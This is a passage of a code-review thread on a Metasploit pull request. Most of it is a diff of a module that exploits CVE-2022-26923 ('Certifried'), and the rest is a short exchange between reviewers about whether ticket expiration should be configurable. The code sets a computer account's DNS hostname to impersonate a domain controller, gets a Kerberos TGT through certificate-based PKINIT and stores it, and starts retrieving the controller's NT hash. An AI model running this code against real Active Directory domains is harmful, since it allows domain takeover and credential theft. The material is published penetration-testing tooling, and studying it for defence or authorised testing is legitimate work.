modules/auxiliary/admin/dcerpc/cve_2022_26923_certifried.rb

```diff
@@ -0,0 +1,435 @@
+    end
+    vprint_status("Retrieved original DNSHostame #{dnshostname} for #{c_name}") if dnshostname
+    dnshostname
+  end
+
+  def impersonate_dc(computer_name)
+    ldap_open do |ldap|
+      dc_dnshostname = get_dnshostname(ldap, datastore['DC_NAME'])
+      print_status("Attempting to set the DNS hostname for the computer #{computer_name} to the DNS hostname for the DC: #{datastore['DC_NAME']}")
+      domain_to_ldif = datastore['DOMAIN'].split('.').map { |dc| "dc=#{dc}" }.join(',')
+      computer_dn = "cn=#{computer_name.delete_suffix('$')},cn=computers,#{domain_to_ldif}"
+      ldap.modify(dn: computer_dn, operations: [[ :add, :dnsHostName, dc_dnshostname ]])
+      new_computer_hostname = get_dnshostname(ldap, computer_name)
+      if new_computer_hostname != dc_dnshostname
+        fail_with(Failure::Unknown, 'Failed to change the DNS hostname')
+      end
+      print_good('Successfully changed the DNS hostname')
+    end
+  rescue Net::LDAP::Error => e
+    print_error("LDAP error: #{e.class}: #{e.message}")
+  end
+
+  def get_tgt(cert)
+    dc_name = datastore['DC_NAME'].dup.downcase
+    dc_name += '$' if !dc_name.ends_with?('$')
+    username, realm = extract_user_and_realm(cert.certificate, dc_name, datastore['DOMAIN'])
+    print_status("Attempting PKINIT login for #{username}@#{realm}")
+    begin
+      server_name = "krbtgt/#{realm}"
+      tgt_result, key = send_request_tgt_pkinit(pfx: cert,
+                                                username: username,
+                                                realm: realm,
+                                                server_name: server_name,
+                                                rport: 88)
+      print_good('Successfully authenticated with certificate')
+      enc_part = decrypt_kdc_as_rep_enc_part(tgt_result.as_rep, key.value)
+
+      info = []
+      info << "realm: #{realm.upcase}"
+      info << "serviceName: #{server_name.downcase}"
+      info << "username: #{username.downcase}"
+
+      ccache = Rex::Proto::Kerberos::CredentialCache::Krb5Ccache.from_responses(tgt_result.as_rep, enc_part)
+      path = store_loot('mit.kerberos.ccache', 'application/octet-stream', rhost, ccache.encode, nil, info.join(', '))
+      print_status("#{peer} - TGT MIT Credential Cache saved to #{path}")
+
+      [ccache.credentials.first, key]
+    rescue Rex::Proto::Kerberos::Model::Error::KerberosError => e
+      print_error("Failed: #{e.message}")
+      nil
+    end
+  end
+
+  def get_ntlm_hash(credential, key)
+    dc_name = datastore['DC_NAME'].dup.downcase
+    dc_name += '$' if !dc_name.ends_with?('$')
+    print_status("Trying to retrieve NT hash for #{dc_name}")
+
+    realm = datastore['DOMAIN'].upcase
+
+    sname = Rex::Proto::Kerberos::Model::PrincipalName.new(
+      name_type: Rex::Proto::Kerberos::Model::NameType::NT_UNKNOWN,
+      name_string: [ dc_name ]
+    )
+
+    now = Time.now.utc
+    expiry_time = now + 1.day
```

Comment:
Would there be any value in allowing a user to configure the ticket expiration date? I see that there are explicit limits on ticket lifetimes, so not sure if having to validate the option would be worth it.

Reply:
This TGS is only requested to get the NTLM hash back from the KDC. The resulting ticket is not cached and I'm not sure it usable anyway. That said, I don't think this is worth having an option to configure the ticket expiration date. I might be wrong here and I'm happy to do it if you think it should.

FYI, I used the default value we use in MSF for any Kerberos ticket requests:

https://github.com/rapid7/metasploit-framework/blob/013679d475793ec6bd810bfeccfa0d7f74c23583/lib/msf/core/exploit/remote/kerberos/service_authenticator/base.rb#L382

https://github.com/rapid7/metasploit-framework/blob/013679d475793ec6bd810bfeccfa0d7f74c23583/lib/msf/core/exploit/remote/kerberos/client.rb#L179

Reply:
I trust your judgement on this, so no need for an option. Thanks!